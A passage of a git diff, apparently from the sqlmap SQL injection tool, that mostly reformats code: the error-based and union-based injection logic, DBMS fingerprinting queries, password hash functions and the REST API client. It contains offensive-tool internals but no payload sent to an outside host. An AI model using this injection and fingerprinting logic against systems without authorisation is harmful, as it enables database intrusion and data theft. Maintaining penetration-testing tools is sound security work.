HTTP_HEADER.URI.lower()) if headers else None)) \ - or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) + trimmed = ( + extractRegexResult(trimcheck, page) or + extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) or + extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) or + extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) + ) if trimmed: if not chunkTest: @@ -308,12 +311,7 @@ def errorUse(expression, dump=False): # entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries - if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in \ - expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) \ - or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ - expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): + if (dump and (conf.limitStart or conf.limitStop)) or (" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and ("(CASE" not in expression.upper() or ("(CASE" in expression.upper() and "WHEN use" in expression))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 6be9d4bbc48..8d69f9c9b5c 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -233,13 +233,7 @@ def unionUse(expression, unpack=True, dump=False): # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries - if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ - kb.forcePartialUnion or \ - (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ - " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ - not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ - and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): + if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or kb.forcePartialUnion or (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression, dump) if limitCond: diff --git a/lib/utils/api.py b/lib/utils/api.py index d40cc17977c..967340fc48a 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -94,7 +94,7 @@ def execute(self, statement, arguments=None): else: self.cursor.execute(statement) except sqlite3.OperationalError, ex: - if not "locked" in getSafeExString(ex): + if "locked" not in getSafeExString(ex): raise else: break @@ -103,22 +103,11 @@ def execute(self, statement, arguments=None): return self.cursor.fetchall() def init(self): - self.execute("CREATE TABLE logs(" - "id INTEGER PRIMARY KEY AUTOINCREMENT, " - "taskid INTEGER, time TEXT, " - "level TEXT, message TEXT" - ")") - - self.execute("CREATE TABLE data(" - "id INTEGER PRIMARY KEY AUTOINCREMENT, " - "taskid INTEGER, status INTEGER, " - "content_type INTEGER, value TEXT" - ")") - - self.execute("CREATE TABLE errors(" - "id INTEGER PRIMARY KEY AUTOINCREMENT, " - "taskid INTEGER, error TEXT" - ")") + self.execute("CREATE TABLE logs(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, time TEXT, level TEXT, message TEXT)") + + self.execute("CREATE TABLE data(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, status INTEGER, content_type INTEGER, value TEXT)") + + self.execute("CREATE TABLE errors(id INTEGER PRIMARY KEY AUTOINCREMENT, taskid INTEGER, error TEXT)") class Task(object): def __init__(self, taskid, remote_addr): @@ -860,7 +849,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=Non return elif command in ("help", "?"): - msg = "help Show this help message\n" + msg = "help Show this help message\n" msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" msg += "use TASKID Switch current context to different task (e.g. 'use c04d8c5c7582efb4')\n" msg += "data Retrieve and show data for current task\n" diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index 6c844859474..bcd9495fccb 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py @@ -167,7 +167,7 @@ def crawlThread(): if not conf.bulkFile: logger.info("searching for links with depth %d" % (i + 1)) - runThreads(numThreads, crawlThread, threadChoice=(i>0)) + runThreads(numThreads, crawlThread, threadChoice=(i > 0)) clearConsoleLine(True) if threadData.shared.deeper: diff --git a/lib/utils/deps.py b/lib/utils/deps.py index 835cb3568b3..e2ea0aa9b5f 100644 --- a/lib/utils/deps.py +++ b/lib/utils/deps.py @@ -108,4 +108,3 @@ def checkDependencies(): if len(missing_libraries) == 0: infoMsg = "all dependencies are installed" logger.info(infoMsg) - diff --git a/lib/utils/getch.py b/lib/utils/getch.py index 00de945bf7a..65043421e4e 100644 --- a/lib/utils/getch.py +++ b/lib/utils/getch.py @@ -25,7 +25,7 @@ def __call__(self): class _GetchUnix(object): def __init__(self): - import tty + __import__("tty") def __call__(self): import sys @@ -44,7 +44,7 @@ def __call__(self): class _GetchWindows(object): def __init__(self): - import msvcrt + __import__("msvcrt") def __call__(self): import msvcrt @@ -81,4 +81,3 @@ def __call__(self): getch = _Getch() - diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 508d3a9ca5b..6487ba25a0c 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -135,7 +135,6 @@ def postgres_passwd(password, username, uppercase=False): 'md599e5ea7a6f7c3269995cba3927fd0093' """ - if isinstance(username, unicode): username = unicode.encode(username, UNICODE_ENCODING) @@ -380,7 +379,7 @@ def _encode64(value, count): ctx = password + magic + salt final = md5(password + salt + password).digest() - for pl in xrange(len(password),0,-16): + for pl in xrange(len(password), 0, -16): if pl > 16: ctx = ctx + final[:16] else: @@ -389,7 +388,7 @@ def _encode64(value, count): i = len(password) while i: if i & 1: - ctx = ctx + chr(0) #if ($i & 1) { $ctx->add(pack("C", 0)); } + ctx = ctx + chr(0) # if ($i & 1) { $ctx->add(pack("C", 0)); } else: ctx = ctx + password[0] i = i >> 1 @@ -417,7 +416,7 @@ def _encode64(value, count): final = md5(ctx1).digest() - hash_ = _encode64((int(ord(final[0])) << 16) | (int(ord(final[6])) << 8) | (int(ord(final[12]))),4) + hash_ = _encode64((int(ord(final[0])) << 16) | (int(ord(final[6])) << 8) | (int(ord(final[12]))), 4) hash_ = hash_ + _encode64((int(ord(final[1])) << 16) | (int(ord(final[7])) << 8) | (int(ord(final[13]))), 4) hash_ = hash_ + _encode64((int(ord(final[2])) << 16) | (int(ord(final[8])) << 8) | (int(ord(final[14]))), 4) hash_ = hash_ + _encode64((int(ord(final[3])) << 16) | (int(ord(final[9])) << 8) | (int(ord(final[15]))), 4) @@ -522,38 +521,38 @@ def _encode64(input_, count): return "%s%s" % (prefix, _encode64(hash_, 16)) __functions__ = { - HASH.MYSQL: mysql_passwd, - HASH.MYSQL_OLD: mysql_old_passwd, - HASH.POSTGRES: postgres_passwd, - HASH.MSSQL: mssql_passwd, - HASH.MSSQL_OLD: mssql_old_passwd, - HASH.MSSQL_NEW: mssql_new_passwd, - HASH.ORACLE: oracle_passwd, - HASH.ORACLE_OLD: oracle_old_passwd, - HASH.MD5_GENERIC: md5_generic_passwd, - HASH.SHA1_GENERIC: sha1_generic_passwd, - HASH.SHA224_GENERIC: sha224_generic_passwd, - HASH.SHA256_GENERIC: sha256_generic_passwd, - HASH.SHA384_GENERIC: sha384_generic_passwd, - HASH.SHA512_GENERIC: sha512_generic_passwd, - HASH.CRYPT_GENERIC: crypt_generic_passwd, - HASH.JOOMLA: joomla_passwd, - HASH.DJANGO_MD5: django_md5_passwd, - HASH.DJANGO_SHA1: django_sha1_passwd, - HASH.WORDPRESS: wordpress_passwd, - HASH.APACHE_MD5_CRYPT: unix_md5_passwd, - HASH.UNIX_MD5_CRYPT: unix_md5_passwd, - HASH.APACHE_SHA1: apache_sha1_passwd, - HASH.VBULLETIN: vbulletin_passwd, - HASH.VBULLETIN_OLD: vbulletin_passwd, - HASH.SSHA: ssha_passwd, - HASH.SSHA256: ssha256_passwd, - HASH.SSHA512: ssha512_passwd, - HASH.MD5_BASE64: md5_generic_passwd, - HASH.SHA1_BASE64: sha1_generic_passwd, - HASH.SHA256_BASE64: sha256_generic_passwd, - HASH.SHA512_BASE64: sha512_generic_passwd, - } + HASH.MYSQL: mysql_passwd, + HASH.MYSQL_OLD: mysql_old_passwd, + HASH.POSTGRES: postgres_passwd, + HASH.MSSQL: mssql_passwd, + HASH.MSSQL_OLD: mssql_old_passwd, + HASH.MSSQL_NEW: mssql_new_passwd, + HASH.ORACLE: oracle_passwd, + HASH.ORACLE_OLD: oracle_old_passwd, + HASH.MD5_GENERIC: md5_generic_passwd, + HASH.SHA1_GENERIC: sha1_generic_passwd, + HASH.SHA224_GENERIC: sha224_generic_passwd, + HASH.SHA256_GENERIC: sha256_generic_passwd, + HASH.SHA384_GENERIC: sha384_generic_passwd, + HASH.SHA512_GENERIC: sha512_generic_passwd, + HASH.CRYPT_GENERIC: crypt_generic_passwd, + HASH.JOOMLA: joomla_passwd, + HASH.DJANGO_MD5: django_md5_passwd, + HASH.DJANGO_SHA1: django_sha1_passwd, + HASH.WORDPRESS: wordpress_passwd, + HASH.APACHE_MD5_CRYPT: unix_md5_passwd, + HASH.UNIX_MD5_CRYPT: unix_md5_passwd, + HASH.APACHE_SHA1: apache_sha1_passwd, + HASH.VBULLETIN: vbulletin_passwd, + HASH.VBULLETIN_OLD: vbulletin_passwd, + HASH.SSHA: ssha_passwd, + HASH.SSHA256: ssha256_passwd, + HASH.SSHA512: ssha512_passwd, + HASH.MD5_BASE64: md5_generic_passwd, + HASH.SHA1_BASE64: sha1_generic_passwd, + HASH.SHA256_BASE64: sha256_generic_passwd, + HASH.SHA512_BASE64: sha512_generic_passwd, +} def storeHashesToFile(attack_dict): if not attack_dict: diff --git a/lib/utils/htmlentities.py b/lib/utils/htmlentities.py index 361acf54900..399e3580c43 100644 --- a/lib/utils/htmlentities.py +++ b/lib/utils/htmlentities.py @@ -8,256 +8,256 @@ # Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html htmlEntities = { - 'quot': 34, - 'amp': 38, - 'lt': 60, - 'gt': 62, - 'nbsp': 160, - 'iexcl': 161, - 'cent': 162, - 'pound': 163, - 'curren': 164, - 'yen': 165, - 'brvbar': 166, - 'sect': 167, - 'uml': 168, - 'copy': 169, - 'ordf': 170, - 'laquo': 171, - 'not': 172, - 'shy': 173, - 'reg': 174, - 'macr': 175, - 'deg': 176, - 'plusmn': 177, - 'sup2': 178, - 'sup3': 179, - 'acute': 180, - 'micro': 181, - 'para': 182, - 'middot': 183, - 'cedil': 184, - 'sup1': 185, - 'ordm': 186, - 'raquo': 187, - 'frac14': 188, - 'frac12': 189, - 'frac34': 190, - 'iquest': 191, - 'Agrave': 192, - 'Aacute': 193, - 'Acirc': 194, - 'Atilde': 195, - 'Auml': 196, - 'Aring': 197, - 'AElig': 198, - 'Ccedil': 199, - 'Egrave': 200, - 'Eacute': 201, - 'Ecirc': 202, - 'Euml': 203, - 'Igrave': 204, - 'Iacute': 205, - 'Icirc': 206, - 'Iuml': 207, - 'ETH': 208, - 'Ntilde': 209, - 'Ograve': 210, - 'Oacute': 211, - 'Ocirc': 212, - 'Otilde': 213, - 'Ouml': 214, - 'times': 215, - 'Oslash': 216, - 'Ugrave': 217, - 'Uacute': 218, - 'Ucirc': 219, - 'Uuml': 220, - 'Yacute': 221, - 'THORN': 222, - 'szlig': 223, - 'agrave': 224, - 'aacute': 225, - 'acirc': 226, - 'atilde': 227, - 'auml': 228, - 'aring': 229, - 'aelig': 230, - 'ccedil': 231, - 'egrave': 232, - 'eacute': 233, - 'ecirc': 234, - 'euml': 235, - 'igrave': 236, - 'iacute': 237, - 'icirc': 238, - 'iuml': 239, - 'eth': 240, - 'ntilde': 241, - 'ograve': 242, - 'oacute': 243, - 'ocirc': 244, - 'otilde': 245, - 'ouml': 246, - 'divide': 247, - 'oslash': 248, - 'ugrave': 249, - 'uacute': 250, - 'ucirc': 251, - 'uuml': 252, - 'yacute': 253, - 'thorn': 254, - 'yuml': 255, - 'OElig': 338, - 'oelig': 339, - 'Scaron': 352, - 'fnof': 402, - 'scaron': 353, - 'Yuml': 376, - 'circ': 710, - 'tilde': 732, - 'Alpha': 913, - 'Beta': 914, - 'Gamma': 915, - 'Delta': 916, - 'Epsilon': 917, - 'Zeta': 918, - 'Eta': 919, - 'Theta': 920, - 'Iota': 921, - 'Kappa': 922, - 'Lambda': 923, - 'Mu': 924, - 'Nu': 925, - 'Xi': 926, - 'Omicron': 927, - 'Pi': 928, - 'Rho': 929, - 'Sigma': 931, - 'Tau': 932, - 'Upsilon': 933, - 'Phi': 934, - 'Chi': 935, - 'Psi': 936, - 'Omega': 937, - 'alpha': 945, - 'beta': 946, - 'gamma': 947, - 'delta': 948, - 'epsilon': 949, - 'zeta': 950, - 'eta': 951, - 'theta': 952, - 'iota': 953, - 'kappa': 954, - 'lambda': 955, - 'mu': 956, - 'nu': 957, - 'xi': 958, - 'omicron': 959, - 'pi': 960, - 'rho': 961, - 'sigmaf': 962, - 'sigma': 963, - 'tau': 964, - 'upsilon': 965, - 'phi': 966, - 'chi': 967, - 'psi': 968, - 'omega': 969, - 'thetasym': 977, - 'upsih': 978, - 'piv': 982, - 'bull': 8226, - 'hellip': 8230, - 'prime': 8242, - 'Prime': 8243, - 'oline': 8254, - 'frasl': 8260, - 'ensp': 8194, - 'emsp': 8195, - 'thinsp': 8201, - 'zwnj': 8204, - 'zwj': 8205, - 'lrm': 8206, - 'rlm': 8207, - 'ndash': 8211, - 'mdash': 8212, - 'lsquo': 8216, - 'rsquo': 8217, - 'sbquo': 8218, - 'ldquo': 8220, - 'rdquo': 8221, - 'bdquo': 8222, - 'dagger': 8224, - 'Dagger': 8225, - 'permil': 8240, - 'lsaquo': 8249, - 'rsaquo': 8250, - 'euro': 8364, - 'weierp': 8472, - 'image': 8465, - 'real': 8476, - 'trade': 8482, - 'alefsym': 8501, - 'larr': 8592, - 'uarr': 8593, - 'rarr': 8594, - 'darr': 8595, - 'harr': 8596, - 'crarr': 8629, - 'lArr': 8656, - 'uArr': 8657, - 'rArr': 8658, - 'dArr': 8659, - 'hArr': 8660, - 'forall': 8704, - 'part': 8706, - 'exist': 8707, - 'empty': 8709, - 'nabla': 8711, - 'isin': 8712, - 'notin': 8713, - 'ni': 8715, - 'prod': 8719, - 'sum': 8721, - 'minus': 8722, - 'lowast': 8727, - 'radic': 8730, - 'prop': 8733, - 'infin': 8734, - 'ang': 8736, - 'and': 8743, - 'or': 8744, - 'cap': 8745, - 'cup': 8746, - 'int': 8747, - 'there4': 8756, - 'sim': 8764, - 'cong': 8773, - 'asymp': 8776, - 'ne': 8800, - 'equiv': 8801, - 'le': 8804, - 'ge': 8805, - 'sub': 8834, - 'sup': 8835, - 'nsub': 8836, - 'sube': 8838, - 'supe': 8839, - 'oplus': 8853, - 'otimes': 8855, - 'perp': 8869, - 'sdot': 8901, - 'lceil': 8968, - 'rceil': 8969, - 'lfloor': 8970, - 'rfloor': 8971, - 'lang': 9001, - 'rang': 9002, - 'loz': 9674, - 'spades': 9824, - 'clubs': 9827, - 'hearts': 9829, - 'diams': 9830, + "quot": 34, + "amp": 38, + "lt": 60, + "gt": 62, + "nbsp": 160, + "iexcl": 161, + "cent": 162, + "pound": 163, + "curren": 164, + "yen": 165, + "brvbar": 166, + "sect": 167, + "uml": 168, + "copy": 169, + "ordf": 170, + "laquo": 171, + "not": 172, + "shy": 173, + "reg": 174, + "macr": 175, + "deg": 176, + "plusmn": 177, + "sup2": 178, + "sup3": 179, + "acute": 180, + "micro": 181, + "para": 182, + "middot": 183, + "cedil": 184, + "sup1": 185, + "ordm": 186, + "raquo": 187, + "frac14": 188, + "frac12": 189, + "frac34": 190, + "iquest": 191, + "Agrave": 192, + "Aacute": 193, + "Acirc": 194, + "Atilde": 195, + "Auml": 196, + "Aring": 197, + "AElig": 198, + "Ccedil": 199, + "Egrave": 200, + "Eacute": 201, + "Ecirc": 202, + "Euml": 203, + "Igrave": 204, + "Iacute": 205, + "Icirc": 206, + "Iuml": 207, + "ETH": 208, + "Ntilde": 209, + "Ograve": 210, + "Oacute": 211, + "Ocirc": 212, + "Otilde": 213, + "Ouml": 214, + "times": 215, + "Oslash": 216, + "Ugrave": 217, + "Uacute": 218, + "Ucirc": 219, + "Uuml": 220, + "Yacute": 221, + "THORN": 222, + "szlig": 223, + "agrave": 224, + "aacute": 225, + "acirc": 226, + "atilde": 227, + "auml": 228, + "aring": 229, + "aelig": 230, + "ccedil": 231, + "egrave": 232, + "eacute": 233, + "ecirc": 234, + "euml": 235, + "igrave": 236, + "iacute": 237, + "icirc": 238, + "iuml": 239, + "eth": 240, + "ntilde": 241, + "ograve": 242, + "oacute": 243, + "ocirc": 244, + "otilde": 245, + "ouml": 246, + "divide": 247, + "oslash": 248, + "ugrave": 249, + "uacute": 250, + "ucirc": 251, + "uuml": 252, + "yacute": 253, + "thorn": 254, + "yuml": 255, + "OElig": 338, + "oelig": 339, + "Scaron": 352, + "fnof": 402, + "scaron": 353, + "Yuml": 376, + "circ": 710, + "tilde": 732, + "Alpha": 913, + "Beta": 914, + "Gamma": 915, + "Delta": 916, + "Epsilon": 917, + "Zeta": 918, + "Eta": 919, + "Theta": 920, + "Iota": 921, + "Kappa": 922, + "Lambda": 923, + "Mu": 924, + "Nu": 925, + "Xi": 926, + "Omicron": 927, + "Pi": 928, + "Rho": 929, + "Sigma": 931, + "Tau": 932, + "Upsilon": 933, + "Phi": 934, + "Chi": 935, + "Psi": 936, + "Omega": 937, + "alpha": 945, + "beta": 946, + "gamma": 947, + "delta": 948, + "epsilon": 949, + "zeta": 950, + "eta": 951, + "theta": 952, + "iota": 953, + "kappa": 954, + "lambda": 955, + "mu": 956, + "nu": 957, + "xi": 958, + "omicron": 959, + "pi": 960, + "rho": 961, + "sigmaf": 962, + "sigma": 963, + "tau": 964, + "upsilon": 965, + "phi": 966, + "chi": 967, + "psi": 968, + "omega": 969, + "thetasym": 977, + "upsih": 978, + "piv": 982, + "bull": 8226, + "hellip": 8230, + "prime": 8242, + "Prime": 8243, + "oline": 8254, + "frasl": 8260, + "ensp": 8194, + "emsp": 8195, + "thinsp": 8201, + "zwnj": 8204, + "zwj": 8205, + "lrm": 8206, + "rlm": 8207, + "ndash": 8211, + "mdash": 8212, + "lsquo": 8216, + "rsquo": 8217, + "sbquo": 8218, + "ldquo": 8220, + "rdquo": 8221, + "bdquo": 8222, + "dagger": 8224, + "Dagger": 8225, + "permil": 8240, + "lsaquo": 8249, + "rsaquo": 8250, + "euro": 8364, + "weierp": 8472, + "image": 8465, + "real": 8476, + "trade": 8482, + "alefsym": 8501, + "larr": 8592, + "uarr": 8593, + "rarr": 8594, + "darr": 8595, + "harr": 8596, + "crarr": 8629, + "lArr": 8656, + "uArr": 8657, + "rArr": 8658, + "dArr": 8659, + "hArr": 8660, + "forall": 8704, + "part": 8706, + "exist": 8707, + "empty": 8709, + "nabla": 8711, + "isin": 8712, + "notin": 8713, + "ni": 8715, + "prod": 8719, + "sum": 8721, + "minus": 8722, + "lowast": 8727, + "radic": 8730, + "prop": 8733, + "infin": 8734, + "ang": 8736, + "and": 8743, + "or": 8744, + "cap": 8745, + "cup": 8746, + "int": 8747, + "there4": 8756, + "sim": 8764, + "cong": 8773, + "asymp": 8776, + "ne": 8800, + "equiv": 8801, + "le": 8804, + "ge": 8805, + "sub": 8834, + "sup": 8835, + "nsub": 8836, + "sube": 8838, + "supe": 8839, + "oplus": 8853, + "otimes": 8855, + "perp": 8869, + "sdot": 8901, + "lceil": 8968, + "rceil": 8969, + "lfloor": 8970, + "rfloor": 8971, + "lang": 9001, + "rang": 9002, + "loz": 9674, + "spades": 9824, + "clubs": 9827, + "hearts": 9829, + "diams": 9830, } diff --git a/lib/utils/progress.py b/lib/utils/progress.py index 4d7c023a4cf..e1cb4ca668b 100644 --- a/lib/utils/progress.py +++ b/lib/utils/progress.py @@ -62,8 +62,7 @@ def update(self, newAmount=0): elif numHashes == allFull: self._progBar = "[%s]" % ("=" * allFull) else: - self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), - " " * (allFull - numHashes)) + self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), " " * (allFull - numHashes)) # Add the percentage at the beginning of the progress bar percentString = getUnicode(percentDone) + "%" diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py index 21249997bfb..e9f413c6c8a 100644 --- a/lib/utils/versioncheck.py +++ b/lib/utils/versioncheck.py @@ -20,4 +20,4 @@ errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) errMsg += "most likely because current version of Python has been " errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')" - exit(errMsg) \ No newline at end of file + exit(errMsg) diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py index 34076c7ec77..98338863b6b 100644 --- a/lib/utils/xrange.py +++ b/lib/utils/xrange.py @@ -69,7 +69,7 @@ def __getitem__(self, index): if isinstance(index, slice): start, stop, step = index.indices(self._len()) return xrange(self._index(start), - self._index(stop), step*self.step) + self._index(stop), step * self.step) elif isinstance(index, (int, long)): if index < 0: fixed_index = index + self._len() diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index 4b01d076de9..5c6896dc598 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -48,11 +48,12 @@ def _sysTablesCheck(self): # Microsoft Access table reference updated on 01/2010 sysTables = { - "97": ("MSysModules2", "MSysAccessObjects"), - "2000" : ("!MSysModules2", "MSysAccessObjects"), - "2002-2003" : ("MSysAccessStorage", "!MSysNavPaneObjectIDs"), - "2007" : ("MSysAccessStorage", "MSysNavPaneObjectIDs"), - } + "97": ("MSysModules2", "MSysAccessObjects"), + "2000": ("!MSysModules2", "MSysAccessObjects"), + "2002-2003": ("MSysAccessStorage", "!MSysNavPaneObjectIDs"), + "2007": ("MSysAccessStorage", "MSysNavPaneObjectIDs"), + } + # MSysAccessXML is not a reliable system table because it doesn't always exist # ("Access through Access", p6, should be "normally doesn't exist" instead of "is normally empty") diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py index d3dfef3068a..7bd4b86d420 100644 --- a/plugins/dbms/db2/connector.py +++ b/plugins/dbms/db2/connector.py @@ -37,7 +37,6 @@ def connect(self): except ibm_db_dbi.OperationalError, msg: raise SqlmapConnectionException(msg) - self.initCursor() self.printConnected() diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py index deb2c22bd38..ed532a57b03 100644 --- a/plugins/dbms/db2/fingerprint.py +++ b/plugins/dbms/db2/fingerprint.py @@ -64,9 +64,9 @@ def getFingerprint(self): value += DBMS.DB2 return value - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer if kb.bannerFp: banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None @@ -127,12 +127,14 @@ def checkDbmsOs(self, detailed=False): infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() if result: - versions = { "2003": ("5.2", (2, 1)), + versions = { + "2003": ("5.2", (2, 1)), "2008": ("7.0", (1,)), "2000": ("5.0", (4, 3, 2, 1)), "7": ("6.1", (1, 0)), "XP": ("5.1", (2, 1)), - "NT": ("4.0", (6, 5, 4, 3, 2, 1)) } + "NT": ("4.0", (6, 5, 4, 3, 2, 1)) + } # Get back-end DBMS underlying operating system version for version, data in versions.items(): diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py index df874f9c0b1..f6b88cb0048 100644 --- a/plugins/dbms/firebird/connector.py +++ b/plugins/dbms/firebird/connector.py @@ -39,8 +39,8 @@ def connect(self): self.checkFileDb() try: - self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), \ - user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") # Reference: http://www.daniweb.com/forums/thread248499.html + # Reference: http://www.daniweb.com/forums/thread248499.html + self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8") except kinterbasdb.OperationalError, msg: raise SqlmapConnectionException(msg[1]) diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py index ba350205e43..f63a57f49ce 100644 --- a/plugins/dbms/firebird/fingerprint.py +++ b/plugins/dbms/firebird/fingerprint.py @@ -68,12 +68,12 @@ def getFingerprint(self): def _sysTablesCheck(self): retVal = None table = ( - ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)), - ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")), - ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")), - ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")), - # TODO: add test for Firebird 2.5 - ) + ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)), + ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")), + ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")), + ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")), + # TODO: add test for Firebird 2.5 + ) for i in xrange(len(table)): version, checks = table[i] diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py index 77e041e0caf..ee605409f27 100644 --- a/plugins/dbms/hsqldb/connector.py +++ b/plugins/dbms/hsqldb/connector.py @@ -46,11 +46,8 @@ def connect(self): try: driver = 'org.hsqldb.jdbc.JDBCDriver' - connection_string = 'jdbc:hsqldb:mem:.' #'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db) - self.connector = jaydebeapi.connect(driver, - connection_string, - str(self.user), - str(self.password)) + connection_string = 'jdbc:hsqldb:mem:.' # 'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db) + self.connector = jaydebeapi.connect(driver, connection_string, str(self.user), str(self.password)) except Exception, msg: raise SqlmapConnectionException(msg[0]) @@ -70,7 +67,7 @@ def execute(self, query): try: self.cursor.execute(query) retVal = True - except Exception, msg: #todo fix with specific error + except Exception, msg: # TODO: fix with specific error logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) self.connector.commit() diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py index 022e04e390d..d4c5354ea42 100644 --- a/plugins/dbms/informix/connector.py +++ b/plugins/dbms/informix/connector.py @@ -37,7 +37,6 @@ def connect(self): except ibm_db_dbi.OperationalError, msg: raise SqlmapConnectionException(msg) - self.initCursor() self.printConnected() diff --git a/plugins/dbms/informix/syntax.py b/plugins/dbms/informix/syntax.py index 62b06283a60..e3cbf0d6969 100644 --- a/plugins/dbms/informix/syntax.py +++ b/plugins/dbms/informix/syntax.py @@ -41,4 +41,4 @@ def escaper(value): for _ in excluded.items(): retVal = retVal.replace(_[1], _[0]) - return retVal \ No newline at end of file + return retVal diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index 79a2c958708..c0442f7be3e 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -108,7 +108,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod conf.db = self.getCurrentDb() elif conf.db is not None: - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) @@ -184,9 +184,7 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod rootQuery = queries[DBMS.MAXDB].columns for tbl in tblList: - if conf.db is not None and len(kb.data.cachedColumns) > 0 \ - and conf.db in 